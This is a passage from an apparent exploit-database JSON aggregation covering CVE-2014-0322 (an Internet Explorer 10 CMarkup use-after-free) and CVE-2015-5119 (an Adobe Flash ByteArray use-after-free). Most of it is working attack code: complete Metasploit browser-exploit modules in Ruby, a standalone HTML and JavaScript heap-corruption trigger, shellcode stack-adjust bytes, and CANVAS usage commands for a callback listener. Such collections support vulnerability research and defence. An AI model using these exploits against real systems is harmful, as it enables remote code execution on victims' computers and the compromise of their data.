Gem::Version.new('11.2.202.468')\r\n end\r\n\r\n false\r\n end\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows',\r\n {\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Linux',\r\n {\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Jul 06 2015',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n b64_payload = Rex::Text.encode_base64(target_payload)\r\n os_name = target_info[:os_name]\r\n\r\n if target.name =~ /Windows/\r\n platform_id = 'win'\r\n elsif target.name =~ /Linux/\r\n platform_id = 'linux'\r\n end\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5119', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\nend\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23842"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:31", "description": "\nMicrosoft Internet Explorer 10 - CMarkup Use-After-Free (MS14-012)", "edition": 1, "published": "2014-04-14T00:00:00", "title": "Microsoft Internet Explorer 10 - CMarkup Use-After-Free (MS14-012)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0322"], "modified": "2014-04-14T00:00:00", "id": "EXPLOITPACK:36F8E5756845AFEDB523188019517EAE", "href": "", "sourceData": "<!--\n MS14-012 Internet Explorer CMarkup Use-After-Free\n Vendor Homepage: http://www.microsoft.com\n Version: IE 10\n Date: 2014-03-31 \n Exploit Author: Jean-Jamil Khalife\n Tested on: Windows 7 SP1 x64 (fr, en)\n Flash versions tested: Adobe Flash Player (12.0.0.70, 12.0.0.77)\n Home: http://www.hdwsec.fr\n Blog : http://www.hdwsec.fr/blog/\n MS14-012 / CVE-2014-0322\n\n Generation:\n \tc:\\mxmlc\\bin>mxmlc.exe AsXploit.as -o AsXploit.swf\n\n Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32851-AsXploit.as\n\n-->\n\n<html>\n<head>\n</head>\n<body>\n\n<script>\n\nvar g_arr = [];\nvar arrLen = 0x250;\n\nfunction dword2data(dword)\n{\n\tvar d = Number(dword).toString(16);\n\twhile (d.length < 8)\n\t\td = '0' + d;\n\n\treturn unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));\n}\n\nfunction eXpl()\n{\n var a=0;\n\n for (a=0; a < arrLen; a++) {\n g_arr[a] = document.createElement('div');\n }\n\t\n\t// Build a new object\n\tvar b = dword2data(0x19fffff3);\n while (b.length < 0x360)\n\t{\n\t\t// mov eax,dword ptr [esi+98h]\n\t\t// ...\n\t\t// mov eax,dword ptr [eax+8]\n\t\t// and dword ptr [eax+2F0h],0FFFFFFBFh\n\t\tif (b.length == (0x98 / 2))\n\t\t{\n\t\t\tb += dword2data(0x1a000010);\n\t\t}\n\t\t// mov ecx,dword ptr [edx+94h]\n\t\t// mov eax,dword ptr [ecx+0Ch]\n\t\telse if (b.length == (0x94 / 2))\n\t\t{\n\t\t\tb += dword2data(0x1a111111);\n\t\t}\n\t\t// mov eax,dword ptr [edx+15Ch]\n\t\t// mov ecx,dword ptr [eax+edx*8]\n\t\telse if (b.length == (0x15c / 2))\n\t\t{\n\t\t\tb += dword2data(0x42424242);\n\t\t}\n\t\telse\n\t\t{\n\t\t\tb += dword2data(0x19fffff3);\n\t\t}\n\t}\n \n\tvar d = b.substring(0, ( 0x340 - 2 )/2);\n \n\t// trigger\n\ttry{\n this.outerHTML=this.outerHTML\n } \n\tcatch(e){\n\t\t\n\t}\n\t\n CollectGarbage();\n\n\t// Replace freed object\n for (a=0; a < arrLen; a++)\n {\n g_arr[a].title = d.substring(0, d.length);\n }\n}\n\n// Trigger the vulnerability\nfunction trigger()\n{\n var a = document.getElementsByTagName(\"script\");\n var b = a[0];\n b.onpropertychange = eXpl;\n var c = document.createElement('SELECT');\n c = b.appendChild(c);\n}\n\n\n\n</script>\n<embed src=AsXploit.swf width=\"10\" height=\"10\"></embed>\n</body>\n</html>", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2019-05-29T19:48:29", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0322"], "edition": 2, "description": "**Name**| ie_cmarkup \n---|--- \n**CVE**| CVE-2014-0322 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| ie_cmarkup \n**Notes**| CVE Name: CVE-2014-0322 \nVENDOR: Microsoft \nNOTES: \n\\- This exploits leaks a vtable pointer of a mshtml object in order to bypass ASLR \n\\- We also leak the shellcode's address so there's no need for spraying the shellcode \n \nThis exploit has been tested on: \n\\- Windows 7 Professional (x86) SP 1 on IE 10 \n\\- Windows 7 Enterprise (x86) SP 1 on IE 10 \n \nThe following mshtml versions are vulnerables and has been tested: \n\\- 10.00.9200.16521 \n \nRepeatability: Single \nReferences: URL:http://technet.microsoft.com/security/bulletin/MS14-012 \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0322 \n\n", "modified": "2014-02-14T16:55:00", "published": "2014-02-14T16:55:00", "id": "IE_CMARKUP", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ie_cmarkup", "type": "canvas", "title": "Immunity Canvas: IE_CMARKUP", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:48:27", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-5119"], "edition": 2, "description": "**Name**| adobe_flash_valueof \n---|--- \n**CVE**| CVE-2015-5119 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| adobe_flash_valueof \n**Notes**| CVE Name: CVE-2015-5119 \nVENDOR: Adobe \nNotes: \n \nTested on: \n\\- Windows 7 x86/x64 IE(32/64) 8, 9, 11 \n \nThis module exploits a use after free vulnerability on Adobe Flash Player. \nWhen you have a ByteArray object ba, and perform an assignment like this ba[0] = object, it will call this object's ValueOf function \nThe ValueOf function can be overridden, so someone can change value of ba in the object ValueOf function \nIf you reallocate the ba memory in the ValueOf function, it will cause a UAF because ba[0] = object will save the original memory and use it after ValueOf function has been called. \n \nIMPORTANT: \n \nYou need to setup a WIN64 MOSDEF INTEL listener in order for the callback \nprocess to work, as the InjectToSelf shellcode doesn't support Universal MOSDEF \nyet. \n \nUsage: \npython ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:adobe_flash_valueof -O auto_detect_exploits:0 \npython commandlineInterface.py -v 17 -p5555 \n \nVersionsAffected: Adobe Flash Player > 9 and before 18.0.0.194 on Windows \nRepeatability: One-shot \nReferences: ['http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'] \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5119 \n\n", "modified": "2015-07-08T14:59:00", "published": "2015-07-08T14:59:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/adobe_flash_valueof", "id": "ADOBE_FLASH_VALUEOF", "type": "canvas", "title": "Immunity Canvas: ADOBE_FLASH_VALUEOF", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-08T00:26:41", "description": "This module exploits an use after free condition on Internet Explorer as used in the wild as part of \"Operation SnowMan\" in February 2014. The module uses Flash Player 12 in order to bypass ASLR and DEP.\n", "published": "2014-04-15T22:55:24", "type": "metasploit", "title": "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0322"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MS14_012_CMARKUP_UAF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free\",\n 'Description' => %q{\n This module exploits an use after free condition on Internet Explorer as used in the wild\n as part of \"Operation SnowMan\" in February 2014. The module uses Flash Player 12 in order to\n bypass ASLR and DEP.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery and Exploit in the wild\n 'Jean-Jamil Khalife', # Exploit\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2014-0322' ],\n [ 'MSB', 'MS14-012' ],\n [ 'BID', '65551' ],\n [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html'],\n [ 'URL', 'http://hdwsec.fr/blog/CVE-2014-0322.html' ]\n ],\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Payload' =>\n {\n 'Space' => 960,\n 'DisableNops' => true,\n 'PrependEncoder' => stack_adjust\n },\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :os_name => 'Windows 7',\n :ua_name => Msf::HttpClients::IE,\n :ua_ver => '10.0',\n :mshtml_build => lambda { |ver| ver.to_i < 16843 },\n :flash => /^1[23]\\./\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n 'Retries' => false\n },\n 'Targets' =>\n [\n [ 'Windows 7 SP1 / IE 10 / FP 12', { } ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2014-02-13',\n 'DefaultTarget' => 0))\n\n end\n\n def stack_adjust\n adjust = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb\n adjust << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit\n adjust << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit\n adjust << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset\n\n adjust\n end\n\n def create_swf\n path = ::File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2014-0322\", \"AsXploit.swf\" )\n fd = ::File.open( path, \"rb\" )\n swf = fd.read(fd.stat.size)\n fd.close\n return swf\n end\n\n def exploit\n @swf = create_swf\n super\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status(\"Sending SWF...\")\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})\n return\n end\n\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Sending HTML...\")\n send_exploit_html(cli, exploit_template(cli, target_info))\n end\n\n def exploit_template(cli, target_info)\n\n flash_payload = \"\"\n padded_payload = get_payload(cli,target_info)\n\n while padded_payload.length % 4 != 0\n padded_payload += \"\\x00\"\n end\n\n padded_payload.unpack(\"V*\").each do |i|\n flash_payload << \"0x#{i.to_s(16)},\"\n end\n flash_payload.gsub!(/,$/, \"\")\n\n html_template = %Q|\n <html>\n <head>\n </head>\n <body>\n\n <script>\n\n var g_arr = [];\n var arrLen = 0x250;\n\n function dword2data(dword)\n {\n var d = Number(dword).toString(16);\n while (d.length < 8)\n d = '0' + d;\n\n return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));\n }\n\n function eXpl()\n {\n var a=0;\n\n for (a=0; a < arrLen; a++) {\n g_arr[a] = document.createElement('div');\n }\n\n var b = dword2data(0x19fffff3);\n\n while (b.length < 0x360) {\n if (b.length == (0x98 / 2))\n {\n b += dword2data(0x1a000010);\n }\n else if (b.length == (0x94 / 2))\n {\n b += dword2data(0x1a111111);\n }\n else if (b.length == (0x15c / 2))\n {\n b += dword2data(0x42424242);\n }\n else\n {\n b += dword2data(0x19fffff3);\n }\n }\n\n var d = b.substring(0, ( 0x340 - 2 )/2);\n\n try{\n this.outerHTML=this.outerHTML\n } catch(e){\n\n }\n\n CollectGarbage();\n\n for (a=0; a < arrLen; a++)\n {\n g_arr[a].title = d.substring(0, d.length);\n }\n }\n\n function trigger()\n {\n var a = document.getElementsByTagName(\"script\");\n var b = a[0];\n b.onpropertychange = eXpl;\n var c = document.createElement('SELECT');\n c = b.appendChild(c);\n }\n\n </script>\n <embed src=#{rand_text_alpha(4 + rand(3))}.swf FlashVars=\"version=<%=flash_payload%>\" width=\"10\" height=\"10\">\n </embed>\n </body>\n </html>\n |\n\n return html_template, binding()\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb"}, {"lastseen": "2020-10-07T22:21:08", "description": "This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public as part of the July 2015 data leak, was described as an Use After Free while handling ByteArray objects. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.\n", "published": "2015-07-07T16:19:48", "type": "metasploit", "title": "Adobe Flash Player ByteArray Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-5119"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_HACKING_TEAM_UAF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player ByteArray Use After Free',\n 'Description' => %q{\n This module exploits an use after free on Adobe Flash Player. The vulnerability,\n discovered by Hacking Team and made public as part of the July 2015 data leak, was\n described as an Use After Free while handling ByteArray objects. This module has\n been tested successfully on:\n\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,\n Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194,\n Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Someone from HackingTeam\n 'juan vazquez', # msf module\n 'sinn3r' # msf module\n ],\n 'References' =>\n [\n ['CVE', '2015-5119'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-03.html'],\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'],\n ['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816']\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => ['win', 'linux'],\n 'Arch' => [ARCH_X86],\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :arch => ARCH_X86,\n :os_name => lambda do |os|\n os =~ OperatingSystems::Match::LINUX ||\n os =~ OperatingSystems::Match::WINDOWS_7 ||\n os =~ OperatingSystems::Match::WINDOWS_81 ||\n os =~ OperatingSystems::Match::WINDOWS_VISTA ||\n os =~ OperatingSystems::Match::WINDOWS_XP\n end,\n :ua_name => lambda do |ua|\n case target.name\n when 'Windows'\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\n when 'Linux'\n return true if ua == Msf::HttpClients::FF\n end\n\n false\n end,\n :flash => lambda do |ver|\n case target.name\n when 'Windows'\n return true if Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')\n when 'Linux'\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468')\n end\n\n false\n end\n },\n 'Targets' =>\n [\n [ 'Windows',\n {\n 'Platform' => 'win'\n }\n ],\n [ 'Linux',\n {\n 'Platform' => 'linux'\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2015-07-06',\n 'DefaultTarget' => 0,\n 'Notes' =>\n {\n 'AKA' => ['0DayFlush']\n }\n ))\n end\n\n def exploit\n @swf = create_swf\n\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status('Sending SWF...')\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n\n if target.name =~ /Windows/\n platform_id = 'win'\n elsif target.name =~ /Linux/\n platform_id = 'linux'\n end\n\n html_template = %Q|<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n |\n\n return html_template, binding()\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5119', 'msf.swf')\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\n\n swf\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-03T17:56:47", "description": "Microsoft Internet Explorer 10 - CMarkup Use-After-Free (MS14-012). CVE-2014-0322. Remote exploit for windows platform", "published": "2014-04-14T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer 10 - CMarkup Use-After-Free MS14-012", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0322"], "modified": "2014-04-14T00:00:00", "id": "EDB-ID:32851", "href": "https://www.exploit-db.com/exploits/32851/", "sourceData": "<!--\r\n MS14-012 Internet Explorer CMarkup Use-After-Free\r\n Vendor Homepage: http://www.microsoft.com\r\n Version: IE 10\r\n Date: 2014-03-31 \r\n Exploit Author: Jean-Jamil Khalife\r\n Tested on: Windows 7 SP1 x64 (fr, en)\r\n Flash versions tested: Adobe Flash Player (12.0.0.70, 12.0.0.77)\r\n Home: http://www.hdwsec.fr\r\n Blog : http://www.hdwsec.fr/blog/\r\n MS14-012 / CVE-2014-0322\r\n\r\n Generation:\r\n \tc:\\mxmlc\\bin>mxmlc.exe AsXploit.as -o AsXploit.swf\r\n\r\n Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32851-AsXploit.as\r\n\r\n-->\r\n\r\n<html>\r\n<head>\r\n</head>\r\n<body>\r\n\r\n<script>\r\n\r\nvar g_arr = [];\r\nvar arrLen = 0x250;\r\n\r\nfunction dword2data(dword)\r\n{\r\n\tvar d = Number(dword).toString(16);\r\n\twhile (d.length < 8)\r\n\t\td = '0' + d;\r\n\r\n\treturn unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));\r\n}\r\n\r\nfunction eXpl()\r\n{\r\n var a=0;\r\n\r\n for (a=0; a < arrLen; a++) {\r\n g_arr[a] = document.createElement('div');\r\n }\r\n\t\r\n\t// Build a new object\r\n\tvar b = dword2data(0x19fffff3);\r\n while (b.length < 0x360)\r\n\t{\r\n\t\t// mov eax,dword ptr [esi+98h]\r\n\t\t// ...\r\n\t\t// mov eax,dword ptr [eax+8]\r\n\t\t// and dword ptr [eax+2F0h],0FFFFFFBFh\r\n\t\tif (b.length == (0x98 / 2))\r\n\t\t{\r\n\t\t\tb += dword2data(0x1a000010);\r\n\t\t}\r\n\t\t// mov ecx,dword ptr [edx+94h]\r\n\t\t// mov eax,dword ptr [ecx+0Ch]\r\n\t\telse if (b.length == (0x94 / 2))\r\n\t\t{\r\n\t\t\tb += dword2data(0x1a111111);\r\n\t\t}\r\n\t\t// mov eax,dword ptr [edx+15Ch]\r\n\t\t// mov ecx,dword ptr [eax+edx*8]\r\n\t\telse if (b.length == (0x15c / 2))\r\n\t\t{\r\n\t\t\tb += dword2data(0x42424242);\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tb += dword2data(0x19fffff3);\r\n\t\t}\r\n\t}\r\n \r\n\tvar d = b.substring(0, ( 0x340 - 2 )/2);\r\n \r\n\t// trigger\r\n\ttry{\r\n this.outerHTML=this.outerHTML\r\n } \r\n\tcatch(e){\r\n\t\t\r\n\t}\r\n\t\r\n CollectGarbage();\r\n\r\n\t// Replace freed object\r\n for (a=0; a < arrLen; a++)\r\n {\r\n g_arr[a].title = d.substring(0, d.length);\r\n }\r\n}\r\n\r\n// Trigger the vulnerability\r\nfunction trigger()\r\n{\r\n var a = document.getElementsByTagName(\"script\");\r\n var b = a[0];\r\n b.onpropertychange = eXpl;\r\n var c = document.createElement('SELECT');\r\n c = b.appendChild(c);\r\n}\r\n\r\n\r\n\r\n</script>\r\n<embed src=AsXploit.swf width=\"10\" height=\"10\"></embed>\r\n</body>\r\n</html>", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/32851/"}, {"lastseen": "2016-02-03T18:03:34", "description": "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free. CVE-2014-0322. Remote exploit for windows platform", "published": "2014-04-16T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer - CMarkup Use-After-Free MS14-012", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0322"], "modified": "2014-04-16T00:00:00", "id": "EDB-ID:32904", "href": "https://www.exploit-db.com/exploits/32904/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free\",\r\n 'Description' => %q{\r\n This module exploits an use after free condition on Internet Explorer as used in the wild\r\n on the \"Operation SnowMan\" in February 2014. The module uses Flash Player 12 in order to\r\n bypass ASLR and finally DEP.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Vulnerability discovery and Exploit in the wild\r\n 'Jean-Jamil Khalife', # Exploit\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-0322' ],\r\n [ 'MSB', 'MS14-012' ],\r\n [ 'BID', '65551' ],\r\n [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html'],\r\n [ 'URL', 'http://hdwsec.fr/blog/CVE-2014-0322.html' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'Payload' =>\r\n {\r\n 'Space' => 960,\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => stack_adjust\r\n },\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :os_flavor => Msf::OperatingSystems::WindowsVersions::SEVEN,\r\n :ua_name => Msf::HttpClients::IE,\r\n :ua_ver => '10.0',\r\n :mshtml_build => lambda { |ver| ver.to_i < 16843 },\r\n :flash => /^12\\./\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f',\r\n 'Retries' => false\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows 7 SP1 / IE 10 / FP 12', { } ],\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Feb 13 2014\",\r\n 'DefaultTarget' => 0))\r\n\r\n end\r\n\r\n def stack_adjust\r\n adjust = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb\r\n adjust << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit\r\n adjust << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit\r\n adjust << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset\r\n\r\n adjust\r\n end\r\n\r\n def create_swf\r\n path = ::File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2014-0322\", \"AsXploit.swf\" )\r\n fd = ::File.open( path, \"rb\" )\r\n swf = fd.read(fd.stat.size)\r\n fd.close\r\n return swf\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n super\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status(\"Sending SWF...\")\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Sending HTML...\")\r\n send_exploit_html(cli, exploit_template(cli, target_info))\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n\r\n flash_payload = \"\"\r\n get_payload(cli,target_info).unpack(\"V*\").each do |i|\r\n flash_payload << \"0x#{i.to_s(16)},\"\r\n end\r\n flash_payload.gsub!(/,$/, \"\")\r\n\r\n html_template = %Q|\r\n <html>\r\n <head>\r\n </head>\r\n <body>\r\n\r\n <script>\r\n\r\n var g_arr = [];\r\n var arrLen = 0x250;\r\n\r\n function dword2data(dword)\r\n {\r\n var d = Number(dword).toString(16);\r\n while (d.length < 8)\r\n d = '0' + d;\r\n\r\n return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));\r\n }\r\n\r\n function eXpl()\r\n {\r\n var a=0;\r\n\r\n for (a=0; a < arrLen; a++) {\r\n g_arr[a] = document.createElement('div');\r\n }\r\n\r\n var b = dword2data(0x19fffff3);\r\n\r\n while (b.length < 0x360) {\r\n if (b.length == (0x98 / 2))\r\n {\r\n b += dword2data(0x1a000010);\r\n }\r\n else if (b.length == (0x94 / 2))\r\n {\r\n b += dword2data(0x1a111111);\r\n }\r\n else if (b.length == (0x15c / 2))\r\n {\r\n b += dword2data(0x42424242);\r\n }\r\n else\r\n {\r\n b += dword2data(0x19fffff3);\r\n }\r\n }\r\n\r\n var d = b.substring(0, ( 0x340 - 2 )/2);\r\n\r\n try{\r\n this.outerHTML=this.outerHTML\r\n } catch(e){\r\n\r\n }\r\n\r\n CollectGarbage();\r\n\r\n 